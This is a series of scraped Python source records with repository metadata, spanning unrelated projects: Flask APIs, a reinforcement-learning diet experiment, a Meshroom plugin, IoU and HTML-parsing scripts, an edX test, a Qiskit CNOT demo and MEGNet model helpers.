TrendType.INCREASING if trends[i] == 1 else TrendType.DECREASING),\n slope=slopes[i],\n line=np.polyfit(x[segments[i][0]:segments[i][1] + 1],\n y[segments[i][0]:segments[i][1] + 1], 1).tolist()\n ) for i in range(len(segments))\n ]\n\n # pettit test\n","repo_name":"nreinartz/tatdd-backend","sub_path":"src/trend/analysis/trend_analyser.py","file_name":"trend_analyser.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24321302005","text":"from server.server import Server\nfrom database.entities.agent import Agent\nfrom database.handler.agent_handler import AgentHandler\n\nfrom flask import request\n\n# Gets an agent by id\n@Server.app.route('/agent/get', methods=['Get'])\n@Server.token_required\n@Server.returns_json\ndef get_agent():\n \"\"\"Returns an agent by id.\n ---\n tags:\n - Agents\n parameters:\n - name: id\n in: query \n type: integer\n required: true\n default: 1\n definitions:\n Agent:\n type: object\n properties:\n id: \n type: integer\n creation_date:\n type: string\n name:\n type: string\n url: \n type: string\n api_token:\n type: string\n vc_type: \n type: string\n security:\n - APIKeyHeader: ['x-auth-token']\n responses:\n 200:\n description: The agent\n schema:\n $ref: '#/definitions/Agent'\n \"\"\"\n id = request.args[\"id\"]\n agent = AgentHandler.get(id)\n return agent\n\n# Gets all agents\n@Server.app.route('/agent/getall', methods=['Get'])\n@Server.token_required\n@Server.returns_json\ndef getAll_agent():\n \"\"\"Returns all stored agents.\n ---\n tags:\n - Agents\n definitions:\n AgentList:\n type: array\n items:\n $ref: '#/definitions/Agent'\n security:\n - APIKeyHeader: ['x-auth-token']\n responses:\n 200:\n description: The agent list\n schema:\n $ref: '#/definitions/AgentList'\n \"\"\"\n agents = AgentHandler.getAll()\n return agents\n\n# Stores a new agent\n@Server.app.route('/agent/add', methods=['Post'])\n@Server.token_required\n@Server.contentType_json\ndef add_agent():\n \"\"\"Stores a new agent.\n ---\n tags:\n - Agents\n parameters:\n - name: name\n in: query \n type: string\n required: true\n - name: body\n in: body\n required: true\n schema:\n id: agent\n required:\n - url\n - token\n - type\n properties:\n url:\n type: string\n description: Agents url.\n default: localhost:123\n token:\n type: string\n description: Agents api token.\n default: SecretToken\n type:\n type: string\n description: Agents vc type.\n default: VC 2.0\n security:\n - APIKeyHeader: ['x-auth-token']\n 
responses:\n 200:\n description: The id of the new agent.\n schema:\n ID: \n type: integer\n \"\"\"\n name = request.args[\"name\"]\n data = request.json\n\n agent = Agent()\n agent.name = name\n agent.url = data[\"url\"]\n agent.api_token = data[\"token\"]\n agent.vc_type = data[\"type\"]\n\n id = AgentHandler.add(agent)\n\n return str(id)","repo_name":"IDunion/ssimoodle","sub_path":"VC_API/src/server/controller/agent_controller.py","file_name":"agent_controller.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"3856511002","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sema\n\"\"\"\nimport datetime\ndate = datetime.datetime.now().strftime('%y_%m_%d_%H_%M')\nimport logging\nimport pickle\nimport random\nimport numpy as np\nimport pandas as pd\nfrom itertools import permutations\nfrom userModel import User, Food, Meal, UserDiet, Substitution\nfrom policies import System\n\n\ndef xp(A0, actions, epsilon, alpha, gamma, subScores,\n nomen, user, diet, nbItem, A, meanQuantities, itemsDict, \n portions, composition, socio, adequacyRef, moderationRef, \n nLastDays, T, filename):\n \n #User initialization \n logging.info('-------------------------------------------------------')\n logging.info('Initialization of user...')\n userDiet = UserDiet(nomen, user, diet, nbItem, A, meanQuantities, itemsDict, \n portions, composition, socio, adequacyRef, moderationRef, \n nLastDays)\n logging.debug('Setting the initial PandietScore...')\n p = userDiet.computePandietScore()\n userDiet.updatePandiet(p)\n \n #Expert initialization\n logging.info('-------------------------------------------------------')\n\n logging.info('Initialization of expert...')\n meals = [x.nameTuple for x in diet if x.nameTuple]\n ms = list(set(meals))\n expert = System(A0, actions, epsilon, alpha, gamma, ms, subScores)\n \n \n # Learning phase\n logging.info('-------------------------------------------------------')\n logging.info('Learning phase...')\n userDiet, expert, pandietRewards = learningPhase(userDiet, expert, T, utility='mixed')\n with open('res2.p', 'wb') as handle:\n pickle.dump({'user':userDiet, 'expert':expert, \n 'pandietRewards':pandietRewards}, handle)\n return userDiet, expert, pandietRewards\n\n\ndef learningPhase(userDiet, expert, T, saveFileName, utility='mixed'):\n \n pandietRewards = {}\n \n lastMeal = userDiet.getLastMeal()\n jour = lastMeal.jour\n tyrep = lastMeal.tyrep\n state = userDiet.generateNextMeal(jour=jour, tyrep=tyrep)\n print('The first state is {}'.format(state.nameTuple))\n userDiet.addMeal(state)\n# p1 = userDiet.computePandietScore()\n# userDiet.updatePandiet(p1)\n\n for timestep in range(1,T):\n userDiet.timestep = timestep\n \n logging.info('LEARNING TIMESTEP {}'.format(timestep))\n logging.info('State : '.format(state))\n distributionDict = expert.provideSubstitutions(state, userDiet, \n function=utility)\n utilityDistribution = distributionDict[utility]\n baselineDistribution = distributionDict['baseline']\n chosenAction = expert.selectAction(state, 'epsilonGreedy', \n utilityDistribution)\n baselineAction = expert.selectAction(state, 'greedy', baselineDistribution)\n \n logging.info('Current state: {}, chosen action: {}'.format(state.nameTuple, chosenAction))\n acceptanceProb = userDiet.computeAcceptabilityProb(state, chosenAction)\n baselineAcceptance = userDiet.computeAcceptabilityProb(state, baselineAction)\n logging.info('Action {}, probability of 
acceptance: {}'.format(chosenAction, acceptanceProb))\n logging.info('Baseline action {}, probability of acceptance: {}'.format(baselineAction, \n baselineAcceptance))\n \n # Track \n expert.trackGreedyBaselineResults(timestep, baselineDistribution, \n baselineAction, baselineAcceptance)\n\n # Generating the next meal\n prevMeal = userDiet.getLastMeal()\n jour = prevMeal.jour\n tyrep = prevMeal.tyrep \n \n newTyrep = 1 + tyrep%3\n if newTyrep == 1:\n newJour = jour + 1\n else:\n newJour = jour\n nextS = userDiet.generateNextMeal(jour=newJour, tyrep=newTyrep)\n logging.info('The next state is: {}'.format(nextS.nameTuple))\n \n # Create the substitution object\n # \n # s = Substitution(x, y, subScore, p.pandiet, deltaPandiet, timestep)\n \n prevPandiet = userDiet.computePandietScore()\n\n if acceptanceProb == 1:\n stateName = state.nameTuple\n x, y, newMeal = userDiet.substituteItemInDiet(state, chosenAction)\n userDiet.replaceLastMeal(newMeal, verbose=1)\n nextPandiet = userDiet.computePandietScore()\n deltaPandiet = prevPandiet.pandiet - nextPandiet.pandiet\n \n subScore = expert.Q[chosenAction].loc[[stateName]].values[0]\n \n s = Substitution(x, y, subScore, nextPandiet.pandiet, deltaPandiet, timestep)\n userDiet.addToSubstitutionTrack(s)\n \n rewardUser = deltaPandiet\n rewardExpert = 1 \n \n pandietRewards[timestep] = deltaPandiet\n\n # Updates user and coach models\n nextSname = nextS.nameTuple\n \n nextDistributionDict = expert.provideSubstitutions(nextS, \n userDiet, \n function=utility)\n nextUtilityDistribution = nextDistributionDict[utility]\n nextChosenAction = expert.selectAction(state, \n 'greedy', \n nextUtilityDistribution)\n \n maxNextValue = expert.Q[nextChosenAction].loc[[nextSname]].values[0]\n expert.qlearningUpdate(state, chosenAction, rewardExpert, maxNextValue)\n userDiet.updateMealDistribution(stateName, newMeal.nameTuple, rewardUser)\n logging.info('Timestep {0}, accepted action {1} with PandietGain {2:.4f} '.format(timestep, \n chosenAction, deltaPandiet))\n else:\n logging.info('Timestep {0}, refused action {1} '.format(timestep, chosenAction))\n nextPandiet = prevPandiet\n state = nextS\n userDiet.updatePandiet(timestep, nextPandiet)\n\n\n logging.info('-------------------------------------------------------')\n with open(saveFileName, 'wb') as handle:\n res = {'userDiet':userDiet, 'expert':expert, 'rewards':pandietRewards}\n pickle.dump(res, handle)\n return userDiet, expert, pandietRewards","repo_name":"SemaA/RLNutrition","sub_path":"XP_rl.py","file_name":"XP_rl.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37867784244","text":"# Generic options:\n# -h [ --help ] produce this help message\n# -w [ --working-folder ] arg working directory (default current directory)\n# -c [ --config-file ] arg (=TextureMesh.cfg)\n# file name containing program options\n# --export-type arg (=ply) file type used to export the 3D scene (ply or obj)\n# --archive-type arg (=2) project archive type: 0-text, 1-binary, 2-compressed binary\n# --process-priority arg (=-1) process priority (below normal by \n# default)\n# --max-threads arg (=0) maximum number of threads (0 for using \n# all available cores)\n# -v [ --verbosity ] arg (=2) verbosity level\n# \n# Texture options:\n# -i [ --input-file ] arg input filename containing camera poses and image list\n# -o [ --output-file ] arg output filename for storing the mesh\n# --decimate arg (=1) decimation factor in range [0..1] to be 
applied to the input surface before refinement (0 - auto, 1 - disabled)\n# --close-holes arg (=30) try to close small holes in the input surface (0 - disabled)\n# --resolution-level arg (=0) how many times to scale down the images before mesh refinement\n# --min-resolution arg (=640) do not scale images lower than this resolution\n# --outlier-threshold arg (=0.0599999987)\n# threshold used to find and remove outlier face textures (0 - disabled)\n# --cost-smoothness-ratio arg (=0.100000001)\n# ratio used to adjust the preference for more compact patches (1 - best \n# quality/worst compactness, ~0 - worst quality/best compactness)\n# --global-seam-leveling arg (=1) generate uniform texture patches using \n# global seam leveling\n# --local-seam-leveling arg (=1) generate uniform texture patch borders \n# using local seam leveling\n# --texture-size-multiple arg (=0) texture size should be a multiple of \n# this value (0 - power of two)\n# --patch-packing-heuristic arg (=3) specify the heuristic used when \n# deciding where to place a new patch (0 \n# - best fit, 3 - good speed, 100 - best \n# speed)\n# --empty-color arg (=16744231) color used for faces not covered by any\n# image\n# --orthographic-image-resolution arg (=0)\n# orthographic image resolution to be generated from the textured mesh - the \n# mesh is expected to be already geo-referenced or at least properly oriented (0 - disabled)\r\n\r\n__version__ = \"1.0\"\r\n\r\nfrom meshroom.core import desc\r\n\r\nclass TextureMesh(desc.CommandLineNode):\r\n commandLine = '\"./OpenMVS/TextureMesh\" {scenedirValue}'\r\n\t\r\n# category = 'MVS'\r\n documentation = '''\r\nIn the case of having a perfect mesh reconstruction and ground-truth camera poses, obtaining the texture is relatively a strait-forward step. In reality however both the mesh and the camera poses contain slight variations/errors at best, and hence the mesh texturing module should be able to cope with them. A very good paper describing such an algorithm, implemented in OpenMVS, is: Let There Be Color! - Large-Scale Texturing of 3D Reconstructions M. Waechter et al. 2014.\r\n## Online\r\n[https://github.com/cdcseacave/openMVS](https://github.com/cdcseacave/openMVS)\r\n'''\r\n\r\n inputs = [\r\n desc.File(\r\n name=\"scenedir\",\r\n label=\"Scene directory\",\r\n description=\"Scene directory\",\r\n value=\"\",\r\n uid=[0],\r\n\t\t)\r\n ]\r\n\r\n outputs = [\r\n desc.File(\r\n name=\"output\",\r\n label=\"Output Folder\",\r\n description=\"Output PLY\",\r\n value=\"\",\r\n uid=[0],\r\n )\r\n ]","repo_name":"natowi/meshroom_external_plugins","sub_path":"draft/OpenMVS/TextureMesh.py","file_name":"TextureMesh.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"3"} +{"seq_id":"2126593524","text":"'''\nSocialytics needs a new tool that allows big brands to see how many of an influencer's followers are loyal to their brand. Complete the get_avg_brand_followers function. It takes two inputs:\n\nall_handles: a 2-dimensional list, or \"list of lists\" of strings representing instagram user handles on a per-influencer basis.\nbrand_name: a string.\nget_avg_brand_followers returns the average number of handles that contain the brand_name across all the lists. 
Each list represents the audience of a single influencer.\n'''\n\ndef get_avg_brand_followers(all_handles, brand_name):\n count = 0\n for handle in all_handles:\n for string in handle:\n if brand_name in string:\n count += 1\n return count / len(all_handles)","repo_name":"dtm589/testing","sub_path":"brandName.py","file_name":"brandName.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4949912610","text":"#!/usr/bin/python3\n\nfrom argparse import ArgumentParser\nimport requests\nimport time\nimport random\nimport sys\n\nplayer_dist = {\n 10243: {\"chance\": 4, \"count\": 0}, # Thomas Mueller\n 6556: {\"chance\": 3, \"count\": 0}, # Manuel Neuer\n 9039: {\"chance\": 2, \"count\": 0}, # Robert Lewandowski\n 5145: {\"chance\": 1, \"count\": 0} #Jonas Hector\n}\nchances_list = []\nfor p in player_dist.keys():\n chances_list.extend([p] * player_dist[p][\"chance\"])\n\n\ndef rand_playerid():\n '''Get a random playerid according to the chances from player_dist'''\n return random.choice(chances_list)\n \n\nif __name__ == \"__main__\":\n '''Sends multiple requests to the minikube public ip. If not specified as cmd-arg, the default amount is 40.\n The requested playerid is randomized chosen based on chance for each player.'''\n\n parser = ArgumentParser()\n parser.add_argument(\"amount\", nargs=\"?\", default=40)\n n = int(parser.parse_args().amount)\n\n start = time.time()\n print(\"Sending requests..\")\n for i in range(1, n):\n time.sleep(0.05)\n playerid = rand_playerid()\n url = 'http://10.0.2.15/person/{0}'.format(playerid)\n response = requests.get(url)\n if response.status_code == 200:\n player_dist[playerid][\"count\"] = player_dist[playerid][\"count\"] + 1\n else:\n print(\"Request for {0} failed with status code {1}.\\nAborting\".format(url, response.status_code))\n sys.exit(-1)\n end = time.time()\n print(\"Performed {0} requests in {1:.2f} seconds. 
Statistics are:\".format(n, (end - start)))\n print(player_dist)\n","repo_name":"Lyceoth/DataEngineeringProject","sub_path":"autorequester.py","file_name":"autorequester.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"558492989","text":"import sys, statistics\r\nimport numpy as np\r\nFILE_DIR = \"single_image_bbox/\"\r\nif len(sys.argv) is not 4:\r\n\tprint(\"Usage: program unbuntu_result_file phone_result_file frequency\")\r\nelse:\r\n infile1 = sys.argv[1]\r\n infile2 = sys.argv[2]\r\n freq = sys.argv[3]\r\n\r\ngt = []\r\nbbox = []\r\ncount_1, count_2 = 0, 0\r\nwith open(infile1, \"r\") as f:\r\n\tfor line in f:\r\n\t\tline = line.split()\r\n\t\t# print(line)\r\n\t\ttry:\r\n\t\t\ttop = eval(line[0])\r\n\t\t\tleft = eval(line[1])\r\n\t\t\tbottom = eval(line[2])\r\n\t\t\tright = eval(line[3])\r\n\t\t\tgt.append((top, left, bottom, right))\r\n\t\texcept:\r\n\t\t\tgt.append(())\r\n\r\npre = []\r\nwith open(infile2, \"r\") as f:\r\n\tfor line in f:\r\n\t\tline = line.split()\r\n\t\ttop = eval(line[0])\r\n\t\tleft = eval(line[1])\r\n\t\tbottom = eval(line[2])\r\n\t\tright = eval(line[3])\r\n\t\tpre.append((top, left, bottom, right))\r\n\r\n# print(gt)\r\nfor i, g in enumerate(gt):\r\n if not g:\r\n continue\r\n #trying to opportunistically change the frequency depending on previous IOU value\r\n #\"\"\"\r\n if(freq ==1): \r\n count_1+=1\r\n else:\r\n count_2+=1\r\n #\"\"\"\r\n if(i%int(freq)==0):\r\n p = pre[i]\r\n #randomly trying to have switch between 1 & 2\r\n #freq = np.random.choice([1,2], p=[0.3, 0.7])\r\n if(True):\r\n top = max(g[0], p[0])\r\n left = max(g[1], p[1])\r\n bottom = min(g[2], p[2])\r\n right = min(g[3], p[3])\r\n interarea = max(0, bottom - top + 1) * max(0, right - left + 1)\r\n #Union Area\r\n b1_area = (g[2] - g[0] +1)*(g[3] - g[1] +1)\r\n b2_area = (p[2] - p[0] +1)*(p[3] - p[1] +1)\r\n # print(interarea)\r\n iou = interarea / (b1_area + b2_area - interarea)\r\n print(iou)\r\n bbox.append(iou)\r\n #trying to opportunistically change the frequency depending on previous IOU value\r\n \"\"\"\r\n if(iou<0.8):\r\n freq = 1\r\n else:\r\n freq = 2\r\n \"\"\"\r\n \r\n\r\nprint(bbox)\r\nprint(sum(bbox)/len(bbox))\r\nprint(statistics.stdev(bbox))\r\n#removing noise\r\nbbox_1 = [i for i in bbox if i > 0.8]\r\nprint(statistics.mean(bbox_1))\r\nprint(statistics.stdev(bbox_1))\r\n\r\nprint(str(count_1) + \",\" + str(count_2))\r\n \r\n \r\n\t","repo_name":"spaul13/Obj_detection_Algorithm_Tuning","sub_path":"calculate_iou_freq.py","file_name":"calculate_iou_freq.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72749000402","text":"import sys\nimport codecs\nfrom html.parser import HTMLParser\n\nclass Parser(HTMLParser):\n\n def __init__(self):\n super().__init__()\n self.recording = False\n\n def handle_starttag(self, tag, attrs):\n if tag == \"ul\":\n self.recording = True\n for attr in attrs:\n print(\" attr:\", attr)\n else:\n self.recording = False\n \n def handle_data(self, data):\n if self.recording:\n print(f\"Found data for tag: {repr(data)}\")\n self.recording = False\n\n\ndef main(argv):\n #print(argv)\n f = codecs.open(argv, 'r')\n doc = f.read()\n #print(doc)\n\n p = Parser()\n p.feed(doc)\n \n\nif __name__=='__main__':\n try:\n main(sys.argv[1])\n except IndexError: print('\\nMissing HTML to 
parse\\n')","repo_name":"enriquemondragon/WebScrapDB","sub_path":"parser_web.py","file_name":"parser_web.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16233583058","text":"from flask import render_template, redirect, request, flash, url_for, jsonify\nfrom flask_login import current_user\nfrom . import behoerde\nfrom app.common.models import Nachricht\nimport os\nfrom shutil import rmtree\n\nfrom app import db\nfrom zipfile import ZipFile\nfrom flask_login import login_required\nfrom flask import current_app as app\n\nfrom app.rest import postJsonJson, getIdJson, \\\n bauantrag_load, \\\n bauantrag_info, \\\n bauantrag_data, \\\n formellePruefung_update, \\\n formellePruefung_data\n\n\n@behoerde.route('/', methods=['GET'])\ndef index():\n bauantraege = Nachricht.query.filter_by(status=\"eingereicht\")\n return render_template(\"app/behoerde/start.html\", bauantraege=bauantraege)\n\n\n@behoerde.route('open/<id>', methods=[\"GET\"])\ndef open(id):\n bauantrag = Nachricht.query.filter_by(id=id).first()\n\n print(bauantrag.ifcloadId)\n\n data = {\"path\": os.path.join(bauantrag.path, \"content\"), \"loadedId\": bauantrag.ifcloadId}\n print(data)\n r = postJsonJson(bauantrag_load, data)\n answer = r.json()\n\n bauantrag.ifcloadId = answer[\"id\"]\n\n if r.status_code is 201:\n r = getIdJson(bauantrag_data, answer[\"id\"])\n answer = r.json()\n content = answer\n\n formellePruefung = {}\n\n if len(bauantrag.nachfolger) > 0:\n\n nachricht = bauantrag.nachfolger[0]\n\n data = {\"path\": os.path.join(nachricht.path, \"content\"), \"loadedId\": nachricht.ifcloadId}\n print(data)\n r = postJsonJson(formellePruefung_data, data)\n answer = r.json()\n\n print(answer)\n\n formellePruefung = {}\n\n if answer[\"befundBeteiligte\"]:\n formellePruefung[\"befundBeteiligte\"] = answer[\"befundBeteiligte\"]\n if answer[\"befundBauvorhaben\"]:\n formellePruefung[\"befundBauvorhaben\"] = answer[\"befundBauvorhaben\"]\n if answer[\"befundLokalisierung\"]:\n formellePruefung[\"befundLokalisierung\"] = answer[\"befundLokalisierung\"]\n if answer[\"befundAnlageMangel\"]:\n formellePruefung[\"befundAnlageMangel\"] = answer[\"befundAnlageMangel\"]\n if answer[\"befundAnlageFehlt\"]:\n formellePruefung[\"befundAnlageFehlt\"] = answer[\"befundAnlageFehlt\"]\n if answer[\"befundAbweichung\"]:\n formellePruefung[\"befundAbweichung\"] = answer[\"befundAbweichung\"]\n if answer[\"frist\"]:\n formellePruefung[\"frist\"] = answer[\"frist\"]\n\n\n return render_template(\"app/behoerde/open.html\", bauantrag=bauantrag, ba_details=content, formellePruefung=formellePruefung)\n\n\n@behoerde.route('/formellePruefung/speichern', methods=['POST'])\ndef formellePruefungAbschicken():\n\n if not current_user.activeRole == \"Behörde\":\n return \"Keine Berechtigung zur Ausführung dieser Operation\", 404\n\n vorgaenger = Nachricht.query.filter_by(id=request.form.get('vorgaengerNachrichtId')).first()\n\n data = {}\n nachricht = None\n\n print(vorgaenger.nachfolger)\n\n if len(vorgaenger.nachfolger) > 0:\n nachricht = vorgaenger.nachfolger[0]\n else:\n nachricht = Nachricht()\n nachricht.vorgaenger = vorgaenger\n db.session.add(nachricht)\n db.session.flush()\n\n repo_path = os.path.abspath(app.root_path + \"/../bauantraege/\")\n nachricht.path = os.path.join(repo_path, str(nachricht.id))\n store_path = os.path.join(nachricht.path, 'content')+\"/\"\n if not os.path.exists(os.path.dirname(store_path)):\n oldmask = os.umask(000)\n 
os.makedirs(os.path.dirname(store_path), 0o775)\n os.umask(oldmask)\n\n nachricht.nachrichtentyp = \"0201\"\n nachricht.status = \"erstellt\"\n nachricht.filename = \"\"\n\n\n\n\n if request.form.get('toggleBeteiligte'):\n data[\"befundBeteiligte\"] = request.form[\"textareaBeteiligte\"]\n\n if request.form.get('toggleBauvorhaben'):\n data[\"befundBauvorhaben\"] = request.form[\"textareaBauvorhaben\"]\n\n if request.form.get('toggleLokalisierung'):\n data[\"befundLokalisierung\"] = request.form[\"textareaLokalisierung\"]\n\n if request.form.get('toggleAnlageMangel'):\n data[\"befundAnlageMangel\"] = request.form[\"textareaAnlageMangel\"]\n\n if request.form.get('toggleAnlageFehlt'):\n data[\"befundAnlageFehlt\"] = request.form[\"textareaAnlageFehlt\"]\n\n if request.form.get('toggleAbweichung'):\n data[\"befundAbweichung\"] = request.form[\"textareaAbweichung\"]\n\n #print (data)\n\n if request.form.get('frist'):\n data[\"frist\"] = request.form[\"frist\"]\n\n data['path'] = nachricht.path\n data['vorgaengerPath'] = vorgaenger.path\n\n\n postJsonJson(formellePruefung_update, data)\n\n db.session.commit()\n\n\n return redirect(url_for('bauantrag.open', id=vorgaenger.id))\n\n","repo_name":"RUB-Informatik-im-Bauwesen/BIM-Bauantrag-Webportal","sub_path":"app/behoerde/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12604993563","text":"\"\"\"\nTests for StudentViewTransformer.\n\"\"\"\n\n\nimport ddt\n\n# pylint: disable=protected-access\nfrom openedx.core.djangoapps.content.block_structure.factory import BlockStructureFactory\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.modulestore.tests.factories import ToyCourseFactory # lint-amnesty, pylint: disable=wrong-import-order\n\nfrom ..student_view import StudentViewTransformer\n\n\n@ddt.ddt\nclass TestStudentViewTransformer(ModuleStoreTestCase):\n \"\"\"\n Test proper behavior for StudentViewTransformer\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.course_key = ToyCourseFactory.create().id\n self.course_usage_key = self.store.make_course_usage_key(self.course_key)\n self.block_structure = BlockStructureFactory.create_from_modulestore(self.course_usage_key, self.store)\n\n @ddt.data(\n 'video', 'html', ['video', 'html'], [],\n )\n def test_transform(self, requested_student_view_data):\n # collect phase\n StudentViewTransformer.collect(self.block_structure)\n self.block_structure._collect_requested_xblock_fields()\n\n # transform phase\n StudentViewTransformer(requested_student_view_data).transform(\n usage_info=None,\n block_structure=self.block_structure,\n )\n\n # verify video data returned iff requested\n video_block_key = self.course_key.make_usage_key('video', 'sample_video')\n assert (self.block_structure\n .get_transformer_block_field(video_block_key,\n StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_DATA) is not None) == \\\n ('video' in requested_student_view_data)\n\n assert not self.block_structure\\\n .get_transformer_block_field(video_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_MULTI_DEVICE)\n\n # verify html data returned iff requested\n html_block_key = self.course_key.make_usage_key('html', 'toyhtml')\n assert (self.block_structure\n .get_transformer_block_field(html_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_DATA) is not None) 
==\\\n ('html' in requested_student_view_data)\n\n assert self.block_structure\\\n .get_transformer_block_field(html_block_key, StudentViewTransformer,\n StudentViewTransformer.STUDENT_VIEW_MULTI_DEVICE)\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/course_api/blocks/transformers/tests/test_student_view.py","file_name":"test_student_view.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"19248005047","text":"\"\"\"Django Evolution version and package information.\n\nThese variables and functions can be used to identify the version of\nReview Board. They're largely used for packaging purposes.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\n\n# The version of Django Evolution\n#\n# This is in the format of:\n#\n# (Major, Minor, Micro, alpha/beta/rc/final, Release Number, Released)\n#\nVERSION = (2, 3, 1, 'alpha', 0, False)\n\n\ndef get_version_string():\n version = '%s.%s' % (VERSION[0], VERSION[1])\n\n if VERSION[2]:\n version += \".%s\" % VERSION[2]\n\n if VERSION[3] != 'final':\n if VERSION[3] == 'rc':\n version += ' RC%s' % VERSION[4]\n else:\n version += ' %s %s' % (VERSION[3], VERSION[4])\n\n if not is_release():\n version += \" (dev)\"\n\n return version\n\n\ndef get_package_version():\n version = '%s.%s' % (VERSION[0], VERSION[1])\n\n if VERSION[2]:\n version += \".%s\" % VERSION[2]\n\n tag = VERSION[3]\n\n if tag != 'final':\n if tag == 'alpha':\n tag = 'a'\n elif tag == 'beta':\n tag = 'b'\n\n version += '%s%s' % (tag, VERSION[4])\n\n return version\n\n\ndef is_release():\n return VERSION[5]\n\n\n__version_info__ = VERSION[:-1]\n__version__ = get_package_version()\n","repo_name":"beanbaginc/django-evolution","sub_path":"django_evolution/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"36889929056","text":"from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, execute,IBMQ\n\nIBMQ.enable_account('Enter API token here')\nprovider = IBMQ.get_provider(hub='ibm-q')\n\nq = QuantumRegister(2,'q')\nc = ClassicalRegister(2,'c')\n\ncircuit = QuantumCircuit(q,c)\ncircuit.x(q[0]) # Pauli x gate applied to first qubit \ncircuit.cx(q[0],q[1]) # CNOT applied to both qubits \ncircuit.measure(q,c) # Qubits states are measured \n\nbackend = provider.get_backend('ibmq_qasm_simulator') # Specifying qasm simulator as the target device \n\nprint('Provider: ',backend)\nprint('')\n\njob = execute(circuit, backend, shots=1)\n \nprint('Executing Job...')\nprint('') \nresult = job.result()\ncounts = result.get_counts(circuit)\n\nprint('RESULT: ',counts)\nprint('')\nprint('Press any key to close')\ninput()","repo_name":"mcoggins96/Quantum-Computing-UK-Repository","sub_path":"Basic/CNOT.py","file_name":"CNOT.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"3"} +{"seq_id":"7374996107","text":"import numpy as np\nfrom typing import List\nfrom megnet.models import MEGNetModel\nfrom megnet.data.crystal import CrystalGraph\nfrom pickle import dump, load\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport os\nfrom figrecipes import PlotlyFig\nfrom typing import Tuple, Any\nfrom scipy.spatial.distance import correlation, cosine\nfrom sklearn.metrics import mean_absolute_error, r2_score, mean_squared_error\n\ndef 
model_setup(ntarget: int = None,\n **kwargs) -> Any:\n \"\"\"\n This function takes in a number of optional parameters for creating a MEGNet model, such as number of neurons \n in different layers, and the number of features for bonds.\n It returns an instance of a MEGNet model which is set up with the given parameters.\n \"\"\"\n ## default architecture:\n n1=kwargs.get('n1', 64) \n n2=kwargs.get('n2', 32) \n n3=kwargs.get('n3', 16)\n nfeat_bond = kwargs.get('nfeat_bond', 100)\n r_cutoff = kwargs.get('r_cutoff', 5)\n gaussian_centers = np.linspace(0, r_cutoff + 1, nfeat_bond)\n gaussian_width = kwargs.get('gaussian_width', 0.5)\n graph_converter = CrystalGraph(cutoff=r_cutoff)\n\n model = MEGNetModel(graph_converter=graph_converter, centers=gaussian_centers, width=gaussian_width,\n ntarget=ntarget, **kwargs)\n stringlist = []\n model.summary(print_fn=lambda x: stringlist.append(x))\n short_model_summary = \"\\n\".join(stringlist)\n print(short_model_summary.splitlines()[-4])\n return model\n\ndef megnet_evaluate_structures(model, structures,\n targets=None,\n scaler=None, **kwargs):\n\n labels = kwargs.get('labels', ['']*len(structures))\n\n noTargets=False\n if targets is None:\n target_values = np.array([1]*len(structures))\n noTargets=True\n else:\n if isinstance(targets, pd.DataFrame):\n target_values=targets.values\n else:\n target_values=targets\n # have to exclude structures that dont form compatible graphs and their corresponding targets.\n structures_valid = []\n targets_valid = []\n labels_valid = []\n structures_invalid = []\n for s, p, l in zip(structures, target_values, labels):\n try:\n graph = model.graph_converter.convert(s)\n structures_valid.append(s)\n if scaler is not None:\n targets_valid.append(np.nan_to_num(\n scaler.transform(p.reshape(1, -1))))\n else:\n targets_valid.append(p)\n labels_valid.append(l)\n except:\n structures_invalid.append(s)\n # structures_valid = np.array(structures_valid)\n\n y = np.array(targets_valid)\n y = y.squeeze()\n labels = np.array(labels_valid)\n print(f\"Following invalid structures: {structures_invalid}.\")\n print(type(structures_valid),structures_valid)\n ypred = model.predict_structures(list(structures_valid))\n if noTargets:\n return (structures_valid,ypred)\n if not noTargets:\n return (structures_valid,ypred, y, labels)\n # y_pred=y_pred.flatten()\n \n\ndef megnet_regression_model(model: object, scaler: object,\n structures: List[str], targets: pd.DataFrame,\n detailed_output: bool = False,\n **kwargs) -> None:\n ''' This function takes in the following required arguments:\n\n model : the model that is used to predict the structures\n structures : the list of structures to predict\n targets : the list of actual values to compare the predictions to\n scaler : the scaler used to scale the targets\n\n It also takes in an optional argument:\n detailed_output : a boolean that controls 